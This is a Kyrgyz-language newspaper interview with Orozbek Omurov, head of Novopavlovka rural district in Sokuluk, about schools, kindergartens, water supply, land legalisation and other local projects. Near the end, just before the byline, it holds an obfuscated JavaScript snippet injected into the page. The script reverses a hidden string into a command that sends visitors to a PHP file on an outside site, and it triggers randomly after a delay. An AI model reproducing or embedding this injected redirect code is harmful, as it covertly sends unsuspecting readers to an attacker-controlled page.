"Эркин-Тоо"

Орозбек Өмүров: “Сүрсүгөн көйгөйлөр чечилүүдө”

Сокулук районундагы Новопавловка айыл аймагынын башчысы Орозбек Өмүров:  “Сүрсүгөн көйгөйлөр чечилүүдө”

Орозбек Өмүровдүн өмүр баянына токтолсок: К.Скрябин атындагы айыл чарба институтун бүткөн. Тун кесиби боюнча инженер-гидротехник.  Суу чарба тармактарында үзүрлүү эмгектенди. Такшалды, айтарлык тажрыйбаларды топтоду. Жетекчилик ишмердиги менен эл оозуна алынды. “Кыргыз Республикасынын суу чарбасынын мыктысы” наамын алган. Кайсы жагынан гана албаңыз татыктуу инсан.

Новопавловкалыктар Орозбек Өмүровичти эң жакшы билишет. Анткени, айыл аймагындагы эл-журттун жумурунда эмне барын жакындан билип, бардык муктаждыктарды четтетүүнүн үстүндө иштеп, тийиштүү жетекчилерге эл үнүн жеткирүүдө теңдешсиз салымын киргизген. Элдик жигитти эл колдоп айылдык кеңештин депутаттыгына шайланган. Элдик депутат көп улуттуу аймактын экономикалык жана социалдык көрсөткүчтөрүн көтөрүүдө көп күчүн жумшады. Ушундай унутулгус эмгектери акыры келип, айыл өкмөттүн эки тизгин, бир чылбырын алууга жеткирди. Бул да болсо талыкпас эмгек үзүрү

Новопавловка айыл аймагынын өкмөт башчысы Орозбек Өмүров айылдаштарынын кадыр-баркына жеринен жетип келгендиктен жетекчилик жигери жагынан камчы салдырбай ийгиликтерди илгерилете баштады.

Орозбек Өмүрович Новопавловка айыл аймагында көптөн бери чечилбей сүрсүп келген маселелердин сап башында билим берүү тармагы турат. Мына ушул багытта сөздү баштасак. Билимсиз алыс узай албайбыз.

Туура айтасыз. Борбор шаарга канатташ орун алган Новопавловка айыл аймагында болжол менен 125 миң адам жашайт Ал эми катталбай эле тааныш, билиш, агайын- туугандарынын үйүндө жашагандар канча? Эгемендикке жеткен күндөн жумушсуздук дээрлик бардык айыл жерлеринде күч алды. Жумуш издегендер борбор шаарга агыла башташты. Кыскасы, ички жана сырткы миграция күч алды. Иш менен бирге туруктуу турак жайга муктаждардын катары болуп көрбөгөндөй өстү. Башаламандык, мыйзамсыздык менен жер басып алгандар көбөйдү. Айыл аймагыбызда ондон ашык жаңы конуштар орун алган. Ошол жаңы конуштардын социалдык курч маселелерин чечүү оңойго турбайт. Өз маалында мындай курч маселелерге кечээги журт башчыларыбыз маани беришкенде бүгүнкүдөй түмөн түйшүктөр болмок эмес. Жыйылган түйшүктөрдөн алыстоо, жеңилдетүү мына эми биздин бирден-бир милдетерибиз болуп калды. Кадырлуу калың калктын муктаждыктарын чечүү үчүн карууну казык кылуудабыз.

Бидин айыл аймагында 2 орто мектеп бар. Ар бир мектеп 1700-2000 окуучуну окутууга тийиш эле. Тилекке каршы, бул мектептерде 4500-5000 окуучуга чейин окушуп, кыйынчылыктар кырданды. Жаңы мектеп куруу муктаждыгы курч маселелердин туу башына айланды. Сапаттуу билим алуу үчүн жагымдуу шарт-жагдай түзүү оорлоду.  Айла жоктуктан орто мектептерде кошумча корпустарды курдуруу колго алынууда. Мисалы,  №1 орто мектебинде жаңы имараттын пайдубалы казылганы менен андан аркы иштери кыймылсыз туруп калды. Ал эми №2 орто мектебинде жаңы корпустун дубалы көтөрүлүп, курулуш иштери жүрүүдө. Бүгүнкү күндө 30 пайыздан ашык куруу иштери бүттү. Дагы жасала турганы арбын.

Президентибиз Садыр Жапаров биздин аймактын жашоочулары менен жолукканда эл муктаждыктарын толук укту. Мисалы, ФПЗдин жеринен 18 гектар жерибиз трансформацияланууга берилди. Учурда трансформациялоо иштерин биринчи кезекте бүткөрүү үчүн бүткүл күчтү  жумшап жатабыз. Бул жердин башы ачылары менен 3500 орундуу орто мектеп курула баштайт. Ошондой эле 3 жаңы бала бакча салынат.

Баарыбызга беш манжадай белгилүү болгондой орто билим берүүчү мектептер менен бирге мектепке чейинки мекемелер бала бакчаларга болгон муктаждык курчуду. Буйруса, 2-3 нөөмөттө окушуп жаткан мектептердин багы ачылгандай, бала бакчалардын да багы ачылат. Ата-энелердин тилектери иш жүзүнө аша баштайт. Анткени, билим фундаменти мына ушул бала бакчаларда калыптанат  Билим көйгөйлөрүн оболу чечүү эч качан күн тартибибизден түшпөйт.

Мына ушул мектеп, бала бакчалар курулуучу жерлерди буга чейин жеке ишкерлер ээлеп алышып, контейнерлерди коюп алышып, соода кылышкан. Көмүрканага айлантышып, тонналаган көмүрлөрдү каптап сатышып, тирилик кылышкан. Азыр ал жерлерди тазалап чыктык. Айланасын курчадык. Курулуш иштерине даярдап койдук. Буйруса, жаңы мектептүү жана 3 бала бакчалуу болобуз. Азыр уюштуруу иштери кызуу жүрүп жатат. Инвесторлорду тартуу, сүйлөшүү иштери кайтарымын берерине ишенебиз.

Жаңы конуштардын көбөйүшү жаңы мектептерге болгон муктаждыктарды эле тереңдетпестен бир топ социалдык көйгөйлөрдү да пайда кылууда. Айталык, жол, суу, жарык жана башка кемчиликтерди чечүүгө чечкиндүү кадамдар керек. Бул жагынан бурулуштар барбы?

Мисалы, мурда айыл эли бир гана суу түтүктөрүнөн суу ичип келишкен. Эми бул суу түтүктөрүнүн курулганына да нечен жыл болду. Утурумдук оңдоо-түзөөлөр толук кандуу кайтарымын бербейт. Жабдуулары эскирди. Барган сайын эл жынч жашап таза сууга болгон талап да өсүүдө.

Бул багытта иштер жанданды. Суу боюнча айтарлык жаңылыктарыбыз бар. “Учкун-2” жаңы конушубузда жаңы суу кууру курулду. Кийинки кезде араб туугандардын кайрымдуулук фонддору менен иштөө кайтарымын берүүдө. “Алтын-Ордо”, “Поле чудес” жаңы конуштарына да жаңы суу куурлары курулуп, пайдаланууга берилди. Таза сууга болгон таңсыктык кадимкидей кыскарды. Темир жол көчөсүндө башталып, бирок ташталып калган суу курулушу бар эле,  учурда курулуп бүтүп, сууга зарлардын үмүтү акталды. Жүздөгөн үй-бүлөлөр таза суу менен толук камсыз болушту.

 Сиз айылдык кеңештин депутаты кезиңизде көп кемчиликтердин бетин ачып, жардам берүүнү көздөп келгенсиз. Азыркы айылдык депутаттарыңыздын ишмердиги ичиңизди жылытабы?

 Албетте, айылдык кеңештердин айыл эли үчүн орду чоң. Эл үнүн ошолор жеткирүүгө тийиш. Депутаттар менен бардык демилгелүү иштерди бирге аткарууга бел байладык. Айылдын социалдык-экономикалык абалын жакшыртмайын эл жашоосу оңолбойт. Сөздүн туурасын айтсак айыл маданиятын өстүрүүгө бизде жеткиликтүү көңүл бурулбай келди. Маданий иш чараларды, жыйындарды өткөрөргө келерде кенен зал таппай калган күндөр арбын. Мектептердин көрүүчүлөр залына көз каранды болуп келдик. Бюджети кудайга шүгүр чоң айыл өкмөтүндө көрүнүктүү бир маданият үйүнүн жоктугу мени абдан өкүндүрүп келген. Мына эми иш планыбызга мына ушул маданият үйүн куруу киргизилип, бюджети караштырылды. Курулуштун долбоору даярдалды. Быйыл жаңы заманбап заңгыраган маданият үйлүү болобуз. Айыл аймагындагы таланттуу жаштардын ар кандай ийримдерин ачуу, таланттарды тартуу табына жетет. Өз каржыбыз менен бул маселени чечебиз. Мындан тышкары жаңы заманбап ФАПты салабыз. Баса белгилеп кетүүчү жагдай мына ушунун баары жергиликтүү бюджеттин эсебинен сааттары чыгат. Бюджетти сарамжалдуу, ары сапаттуу пайдалануу негизги максаттарыбыздан экени талашсыз.

Баса, коомдук тартиптин сакчылары милициялардын туруктуу иш кабинети жок болчу. “Менин милициям мени коргойт” демекчи милиция кызматкерлеринин кызматы татаал. Алар үчүн шарт-жагдай түзүү албетте биздин, жергиликтүү өкмөттөрдүн милдети. Бул парзыбызды жакында аткардык. Учаскалык милиция кызматкерлери үчүн жаңы жаркыраган кеңсе куруп бердик. Тийиштүү жабдуулар менен камсыз болушту. Тартипти сактоочулардын нечен жылдан берки тилеги мына жакында гана аткарылды.

Орозбек Өмүрович, эгемендикке жеткен күндөн өз үй-өлөң төшөгү жоктор көбөйдү. Баарынан да кыйыны кыйла жылдан бери салып, жашап жаткандары менен үй-жайлары мыйзам чегинде катталбай карапайым эл каржалып келди. Ошол элдин нечен жылдан берки сүрсүгөн көйгөйлөрүн чечип, президентибиз эл сүйүүсүнө арзыды. Мындай көйгөйлөр сиздерде да бар эле. Мыйзамдуу каттоо иштерин бүтүрүп жатасыздарбы?

 Мурдагы журт башчылар үй жайсыз карапайым элдин мүдөөсүн чечпей келишкен. Бир жакшы жери президентибиз Садыр Нургожоевич ошол эл менен жеринде жолугушуп, ак, карасын териштирп оң жагына чечип берди. Эми элдин кубанганын айтпа!

Мыйзамдаштырылбай жаткан ошол турак жайларды мыйзамдаштыруу боюнча азыр кызуу иштер жүрүп жатат. Транцформациялоо иши аягына чыкса, жаңы конуштардагы инфраструктураларды карап, тийиштүү иштерди илгерилетебиз. Айталык, жаңы конуштарда жашагандар өз каражаттарына суу киргизип, электр зымдарын ыңгайларына жараша тартып алышкан. Бул багытта коопсуздук эске алынбаган, тобокелдик менен жашап жатышкан. Учурда биз жабдууларын мыйзамдаштырып, коопсуздук боюнча жасалчу иштерди колго алып жатабыз.

Жаңы конуштардагы  чоң көйгөйлөр жолдун начардыгы, коомдук транспорттордун ойдогудай каттай албай жаткандыгы болуп саналат. Санап олтурсак жаңы конуштардын тегерегинде жасалчу иштер көп. Чекеден чечип жатабыз. Эл үнүн президент угуп жаткан соң. биз укпай кайда барабыз? Колдон келген колдоолорду жасоодобуз. Нечен жылдан берки талаштуу маселелер жумшарууда. Бул жакшы көрсөткүч.

Мен жергиликтүү депутат кезимден кездешкен көйгөйлөрдү чечүүгө бардык аракеттеримди жумшаар элем. Албетте, аткарылгандарына токтолгум келбейт. Кейигеним, аймагыбыздагы саркынды сууларды тазалоочу жай курсак деп ар бир сессияларда айтып келдим. Саркынды сууларды тазалоочу жай куруу боюнча инвесторлорду таап, сүйлөшүү ийине жетерде мурдагы айыл өкмөт жерин чечип бербей койгон эле. Келген инвесторлор 2 ай күтүп, үмүттөрүн үзүп кете берген. Мына эми ошол инвесторлор менен кайрадан сүйлөшүп жатабыз. Саркынды сууларды тазалоочу заманбап жай куруп алсак, экология сакталат. Мурдагы депутат кезибизде 6 гектар жерди мына ушул максатта бекитип бергенбиз. Азыр мына ушул олуттуу иштин саатын чыгаруу үчүн бардык аракетти жасап жатабыз. Бул айтканга оңой болгону менен айтып болгус пайдасы  зор иш. Бүткүл дүйнө жүзүнүн эли экологиянын тазалыгы үчүн күрөшүп жатат. Биз да артта калбай, алга кадам жасашыбыз керек. Биринчи байлык ден соолукка камкордук көрүү тазалыктан башталат.

Орозбек Өмүрович, сиздердеги айтарлык жаңылык элди тейлөө борборун (ЦОН)ду айыл аймагында ачууну көздөп жатыпсыздар. Ушул багытта айтып берсеңиз?

Эртеден кечке кеңселерде кезек күтүшүп, иш кагаздарын саргайып күткөн элдин убактысы талаага кетүүчү. Алакандай справка алуу үчүн ат арытып алыстан келгендер  убайымга жуурулчу. Ал эми убакыт алтындан кымбат эмеспи. Мына ушул саргайып күткөн элдин көйгөйлөрүн чечүү үчүн санариптешкен элди тейлөө борборлору (ЦОН)дор ачылып жатат. Тилекке каршы, облус же райборлордо ачылган ЦОНдордон тыянак аз болууда. Баягыдай эле кезек күтүү чарчатууда дешкендер четтен чыгууда. Ошондуктан  биз өз аймагыбызда эл тейлөө борборун (ЦОН) ачууну максат кылдык. Азыр уюштуруу иштери жүрүүдө. Жакын арада ачылыш салтанатын жасайбыз. Элди тез, ары сапаттуу жана маданияттуу тейлөө борборуна айлантабыз.

Айтканыңыз келсин!

$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}too.kg/wp-content/uploads/2022/02/01_02.pdf»>2022-жылдын 1-февралы 

Айчүрөк  МАКЕШОВА

Please wait while flipbook is loading. For more related info, FAQs and issues please refer to DearFlip WordPress Flipbook Plugin Help documentation.

Пример HTML-страницы
error: Content is protected !!